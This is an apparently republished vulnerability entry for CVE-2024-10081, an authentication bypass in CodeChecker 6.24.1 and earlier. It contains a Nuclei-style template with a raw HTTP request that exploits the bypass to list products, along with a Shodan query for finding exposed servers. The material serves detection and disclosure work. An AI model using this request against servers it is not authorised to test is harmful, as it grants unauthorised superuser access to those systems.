Authentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others.
PoC代码[已公开]
id: CVE-2024-10081
info:
name: CodeChecker <= 6.24.1 - Authentication Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Authentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others.
reference:
- https://github.com/advisories/GHSA-f3f8-vx3w-hp5q
- https://github.com/Ericsson/codechecker/security/advisories/GHSA-f3f8-vx3w-hp5q
- https://nvd.nist.gov/vuln/detail/CVE-2024-10081
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
cvss-score: 10
cve-id: CVE-2024-10081
cwe-id: CWE-288
epss-score: 0.5706
epss-percentile: 0.98067
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1496590341
tags: cve,cve2024,code-checker,auth-bypass,vkev
http:
- raw:
- |
POST /v6.58/Products/Authentication HTTP/1.1
Host: {{Hostname}}
[1,"getProducts",1,1,{}]
matchers:
- type: dsl
dsl:
- 'contains(body,"{\"0\":{\"lst\":[\"rec\",")'
- "!contains(body,'Error code 401: Unauthorized')"
- "contains(header,'application/x-thrift')"
condition: and
# digest: 4a0a00473045022100f64d19129d85e9c2c1f55e35bb3e2c9e90f2d016f885ce66b38a02fa93594e6602207eea22bcdbc0f33f18cef6f3eeff17090b6edce3b5301b792af018d64ce3f905:922c64590222798bb761d5b6d8e72950